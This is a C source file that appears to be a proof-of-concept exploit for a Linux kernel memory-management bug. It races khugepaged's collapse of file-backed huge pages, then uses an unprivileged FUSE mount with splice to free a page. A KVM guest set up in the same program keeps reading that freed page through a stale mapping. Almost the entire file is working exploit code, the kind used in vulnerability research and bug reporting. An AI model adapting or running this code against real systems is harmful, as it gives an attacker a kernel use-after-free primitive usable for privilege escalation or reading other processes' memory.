#define _GNU_SOURCE
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <time.h>
#include <errno.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <asm/kvm_para.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <linux/kvm.h>
#include <linux/fuse.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

/////////////////////// BEGIN FUSE
static void write_file(char *name, char *buf) {
  int fd = SYSCHK(open(name, O_WRONLY));
  if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "write %s", name);
  close(fd);
}

static void write_map(char *name, int outer_id) {
  char buf[100];
  sprintf(buf, "0 %d 1", outer_id);
  write_file(name, buf);
}

void fuse_move_and_free_page(int reuse_fd) {
  // drain the LRU pagevec
  SYSCHK(munmap(SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)), 0x1000));

  int outer_uid = getuid();
  int outer_gid = getgid();
  SYSCHK(unshare(CLONE_NEWUSER|CLONE_NEWNS));
  write_file("/proc/self/setgroups", "deny");
  write_map("/proc/self/uid_map", outer_uid);
  write_map("/proc/self/gid_map", outer_gid);

  SYSCHK(close(SYSCHK(open("/tmp/mntfile", O_RDONLY|O_CREAT, 0666))));
  int ffd = SYSCHK(open("/dev/fuse", O_RDWR));
  char opts[4096];
  sprintf(opts, "fd=%d,rootmode=0100777,user_id=%d,group_id=%d", ffd, getuid(), getgid());
  SYSCHK(mount("none", "/tmp/mntfile", "fuse", MS_NOSUID|MS_NODEV, opts));

  int child = SYSCHK(fork());
  if (child == 0) {
    close(ffd);
    int fd = SYSCHK(open("/tmp/mntfile", O_RDONLY));
    printf("child opened\n");
    char dummy;
    SYSCHK(read(fd, &dummy, 1));
    printf("child read() worked\n");
    exit(0);
  }

#define READ(_obj) if (read(ffd, &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to read " #_obj)
#define WRITE(_obj) if (write(ffd, &(_obj), sizeof(_obj)) != sizeof(_obj)) err(1, "failed to write " #_obj)

  while (1) {
    struct {
      struct fuse_in_header inh;
      union {
        struct fuse_init_out init_out;
        struct fuse_open_in open_in;
        struct fuse_read_in read_in;
        char pad[10000];
      };
    } buf;
    assert(SYSCHK(read(ffd, &buf, sizeof(buf))) >= sizeof(buf.inh));
    if (buf.inh.opcode == FUSE_INIT) {
      printf("init\n");
      struct {
        struct fuse_out_header h;
        struct fuse_init_in b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .major = buf.init_out.major, .minor = buf.init_out.minor }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_OPEN) {
      printf("open\n");
      struct {
        struct fuse_out_header h;
        struct fuse_open_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .open_flags = 0 }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_GETATTR) {
      printf("getattr\n");
      struct {
        struct fuse_out_header h;
        struct fuse_attr_out b;
      } reply = {
        .h = { .len = sizeof(reply), .error = 0, .unique = buf.inh.unique },
        .b = { .attr_valid = 0xffffffff, .attr = { .size = 0x1000, .mode = 0100777 } }
      };
      WRITE(reply);
    } else if (buf.inh.opcode == FUSE_READ) {
      printf("read!!!\n");
      assert(buf.read_in.offset == 0);
      assert(buf.read_in.size == 0x1000);
      int reply_pipe[2];
      SYSCHK(pipe(reply_pipe));
      struct fuse_out_header h = {
        .len = sizeof(h) + 0x1000,
        .unique = buf.inh.unique
      };
      assert(SYSCHK(write(reply_pipe[1], &h, sizeof(h))) == sizeof(h));
      off64_t in_off = 0;
      SYSCHK(splice(reuse_fd, &in_off, reply_pipe[1], NULL, 0x1000, SPLICE_F_MOVE));
      SYSCHK(splice(reply_pipe[0], NULL, ffd, NULL, h.len, SPLICE_F_MOVE));
      break;
    } else {
      errx(1, "FUSE_??? %d", buf.inh.opcode);
    }
  }
  close(ffd);
  printf("waiting for child...\n");
  int wstatus;
  SYSCHK(wait(&wstatus));
  printf("child exited\n");

  // drain the LRU pagevec
  SYSCHK(munmap(SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)), 0x1000));  
}
/////////////////////// END FUSE

struct idt_entry {
  unsigned long a;
  unsigned long b;
};

extern char guest_code_begin[];
extern char guest_code_end[];
extern char guest_code_fault[];
asm(
"guest_code_begin:\n"
"movq (%rax), %rax\n"
"guest_code_fault:\n"
"int $123\n"
"guest_code_end:\n"
);

struct guest_memory {
  /* 0x0000 */ unsigned long pagetable1[512];
  /* 0x1000 */ unsigned long pagetable2[512];
  /* 0x2000 */ unsigned long pagetable3[512];
  /* 0x3000 */ unsigned long pagetable4[512];
  /* 0x4000 */ unsigned char guest_code[4096];
} __attribute__((aligned(4096)));
struct guest_memory gmem;
#define GPHYS(x) offsetof(struct guest_memory, x)

#define VICTIM_GPHYS 0x200000UL

static void create_region(int vm, int slot, unsigned long guest_phys, unsigned long host_addr, unsigned long size) {
  struct kvm_userspace_memory_region region = {
    .slot = slot,
    .guest_phys_addr = guest_phys,
    .memory_size = size,
    .userspace_addr = host_addr
  };
  if (ioctl(vm, KVM_SET_USER_MEMORY_REGION, &region))
    err(1, "set region %d", slot);
}

static int vcpu;
struct kvm_run *vcpu_state;
static unsigned long do_kvm_read() {
  struct kvm_regs regs = { .rip = 0x0, .rflags = 2, .rax = 0x1000 };
  if (ioctl(vcpu, KVM_SET_REGS, &regs))
    err(1, "set regs");
  if (ioctl(vcpu, KVM_RUN, 0))
    err(1, "run vcpu");
  printf("exit_reason = %d\n", vcpu_state->exit_reason);
  if (vcpu_state->exit_reason == KVM_EXIT_FAIL_ENTRY) {
    printf("KVM_EXIT_FAIL_ENTRY happened: hardware_entry_failure_reason = 0x%lx (see arch/x86/include/uapi/asm/vmx.h)\n",
           (unsigned long)vcpu_state->fail_entry.hardware_entry_failure_reason);
  }
  if (vcpu_state->exit_reason == KVM_EXIT_SHUTDOWN)
    printf("KVM_EXIT_SHUTDOWN happened\n");
  if (ioctl(vcpu, KVM_GET_REGS, &regs))
    err(1, "get regs");
  printf("guest RIP: 0x%llx\n", regs.rip);
  assert(regs.rip == (unsigned long)guest_code_fault - (unsigned long)guest_code_begin);
  return regs.rax;
}

#define TESTFILE "/var/tmp/thp_test"
int main(void) {
  setbuf(stdout, NULL);

  unlink(TESTFILE);
  int fd_rw = SYSCHK(open(TESTFILE, O_RDWR|O_CREAT, 0700));
  int fd = SYSCHK(open(TESTFILE, O_RDONLY));
  for (int i=0; i<512; i++) {
    SYSCHK(pwrite(fd_rw, "a", 1, i * 0x1000UL + 0xfff));
  }
  unsigned long marker = 0x0123456789abcdef;
  SYSCHK(pwrite(fd_rw, &marker, sizeof(marker), 0));
  fsync(fd_rw); // pages must be clean for file THP
  close(fd_rw);

  char *mapping = SYSCHK(mmap((void*)(9*0x200000), 0x200000, PROT_READ|PROT_EXEC/*file THP needs exec*/, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));
  char *tarpit_mapping = SYSCHK(mmap((void*)0x200000, 7*0x200000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED_NOREPLACE, -1, 0));
  *(volatile char *)tarpit_mapping = 1;

  /* spam some VMAs to make /proc/self/maps longer */
#ifdef SPAM1
  for (int i=0; i<100; i++)
    SYSCHK(mmap(NULL, 0x1000, ((i&1)?PROT_READ:PROT_NONE), MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  int maps_fd = SYSCHK(open("/proc/self/maps", O_RDONLY));
#endif
  char *blah_region = SYSCHK(mmap(NULL, 0x200000UL*512*512, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_NORESERVE, -1, 0));
  SYSCHK(madvise(blah_region, 0x200000UL*512*512, MADV_NOHUGEPAGE));
  for (unsigned long i = 0; i < 512*512; i++) {
    *(volatile char *)(blah_region + 0x200000UL + i * 0x1000UL);
  }

  int smaps_fd = SYSCHK(open("/proc/self/smaps", O_RDONLY));
  int pm_fd = SYSCHK(open("/proc/self/pagemap", O_RDONLY));

  for (int i=0; i<512; i++)
    *(volatile char *)(mapping+i*0x1000);

  SYSCHK(madvise(tarpit_mapping, 7*0x200000, MADV_HUGEPAGE));
  SYSCHK(madvise(mapping, 0x200000, MADV_HUGEPAGE));
  //system("head -n60 /proc/$PPID/smaps");

  /*
   * wait for khugepaged to collapse the pages, but try to hold the mmap lock
   * to defer PTE collapse
   */
  unsigned long iter = 0;
  printf("begin mmap_lock spam\n");
  while (1) {
    iter++;

    // keep mmap lock read-held for a little bit
#ifdef SPAM1
    char buf[4096];
    SYSCHK(pread(maps_fd, buf, sizeof(buf), 0));
#endif
    SYSCHK(madvise(blah_region, 0x200000UL*512*512, MADV_DONTNEED));

    // check if khugepaged zapped our PTEs
    uint64_t pm_entry;
    off_t pm_off = (unsigned long)mapping / 0x1000 * sizeof(pm_entry);
    assert(SYSCHK(pread(pm_fd, &pm_entry, sizeof(pm_entry), pm_off)) == sizeof(pm_entry));
    if ((pm_entry & (1ULL << 63)) == 0) {
      time_t t1 = time(NULL);
      while (time(NULL) < t1 + 2) {
        SYSCHK(madvise(blah_region, 0x200000UL*512*512, MADV_DONTNEED));
      }
      printf("pagemap entry gone in iter %lu\n", iter);
      break;
    }
  }

  /* try to re-fault the 4K PTE, now pointing to THP */
  *(volatile unsigned long *)mapping;



  /* ===== KVM setup ===== */
  gmem.pagetable1[0] = GPHYS(pagetable2) | 7;
  gmem.pagetable2[0] = GPHYS(pagetable3) | 7;
  gmem.pagetable3[0] = GPHYS(pagetable4) | 7;
  gmem.pagetable4[0] = GPHYS(guest_code) | 7;
  gmem.pagetable4[1] = VICTIM_GPHYS | 5; /* RO! */
  memset(gmem.guest_code, 0xcc, 0x1000);
  memcpy(gmem.guest_code, guest_code_begin, guest_code_end - guest_code_begin);

  int kvm = open("/dev/kvm", O_RDWR);
  if (kvm == -1)
    err(1, "open kvm");
  int mmap_size = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, 0);
  if (mmap_size == -1)
    err(1, "KVM_GET_VCPU_MMAP_SIZE");

  int vm = ioctl(kvm, KVM_CREATE_VM, 0);
  if (vm == -1)
    err(1, "create vm");
  if (ioctl(vm, KVM_SET_TSS_ADDR, 0x10000000UL))
    err(1, "KVM_SET_TSS_ADDR");
  create_region(vm, 0, 0x0, (unsigned long)&gmem, sizeof(gmem));
  create_region(vm, 1, VICTIM_GPHYS, (unsigned long)mapping, 4096);

  vcpu = ioctl(vm, KVM_CREATE_VCPU, 0);
  if (vcpu == -1)
    err(1, "create vcpu");
  vcpu_state = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE, MAP_SHARED, vcpu, 0);
  if (vcpu_state == MAP_FAILED)
    err(1, "mmap vcpu");

  struct kvm_sregs sregs;
  if (ioctl(vcpu, KVM_GET_SREGS, &sregs))
    err(1, "KVM_GET_SREGS");
  sregs.cs.selector = 0;
  sregs.cs.base = 0;
  sregs.cr0 = (/*PE*/1<<0) | (/*WP*/1<<16) | (/*PG*/1U<<31);
  sregs.cr3 = GPHYS(pagetable1);
  sregs.cr4 = (/*PAE*/1<<5);
  sregs.efer = (/*LME*/1<<8) | (/*LMA*/1<<10);

  /*
   * set up segments.
   * note that this never actually writes the segments into a GDT; we just load
   * the segments directly.
   */
  sregs.cs = (struct kvm_segment) {
    .limit = 0xffffffff,
    .selector = (1 << 3) | 3,
    .present = 1,
    .type = 11/*Code: Execute/Read, accessed*/,
    .dpl = 3,
    .s = 1/*code or data segment*/,
    .l = 1/*64-bit code segment, must have .db clear*/,
    .g = 1/*segment limit interpreted in 4KiB units*/
  };
  sregs.ds = sregs.cs;
  sregs.ds.type = 3/*Data: Read/Write, accessed*/;
  sregs.ds.selector = (2 << 3) | 3;
  sregs.es = sregs.fs = sregs.gs = sregs.ss = sregs.ds;

  if (ioctl(vcpu, KVM_SET_SREGS, &sregs))
    err(1, "set sregs");

  assert(do_kvm_read() == 0x0123456789abcdef || 1 == 0);
  assert(do_kvm_read() == 0x0123456789abcdef || 2 == 0);

  /* did it work? */
  char smaps_buf[4096+1];
  int smaps_len = SYSCHK(pread(smaps_fd, smaps_buf, sizeof(smaps_buf)-1, 0));
  smaps_buf[smaps_len] = '\0';
  char *shmem_pmd_line = strstr(strstr(smaps_buf, TESTFILE), "\nFilePmdMapped:");
  assert(shmem_pmd_line != NULL);
  shmem_pmd_line += 16;
  while (*shmem_pmd_line == ' ') shmem_pmd_line++;
  assert(*shmem_pmd_line >= '0' && *shmem_pmd_line <= '9');
  if (atoi(shmem_pmd_line) != 0) {
    system("head -n60 /proc/$PPID/smaps");
    errx(1, "failed, hugepaged managed to write-lock on first try?");
  }

  printf("first khugepaged run seems to have worked as expected. awaiting collapse...\n");
  //system("head -n60 /proc/$PPID/smaps");
  SYSCHK(munmap(tarpit_mapping, 7*0x200000));

  /* wait for collapse_pte_mapped_thp() */
  while (1) {
    smaps_len = SYSCHK(pread(smaps_fd, smaps_buf, sizeof(smaps_buf)-1, 0));
    smaps_buf[smaps_len] = '\0';
    char *rss_line = strstr(strstr(smaps_buf, TESTFILE), "\nRss:");
    assert(rss_line != NULL);
    rss_line += 5;
    while (*rss_line == ' ') rss_line++;
    assert(*rss_line >= '0' && *rss_line <= '9');
    if (atoi(rss_line) == 0)
      break;
    sleep(1); // don't hog the lock
  }
  printf("second khugepaged run seems to have completed\n\n\n");

  printf("##################### KVM reads 0x%lx\n", do_kvm_read());
  //system("head -n60 /proc/$PPID/smaps");
  //printf("\n\n\n");
  fuse_move_and_free_page(fd);
  //printf("\n\n\n");
  printf("##################### KVM reads 0x%lx\n", do_kvm_read());
  //system("head -n60 /proc/$PPID/smaps");

  while (1) {
    sleep(20);
    //printf("\n\n\n");
    printf("##################### KVM reads 0x%lx\n", do_kvm_read());
    //system("head -n60 /proc/$PPID/smaps");
  }
}
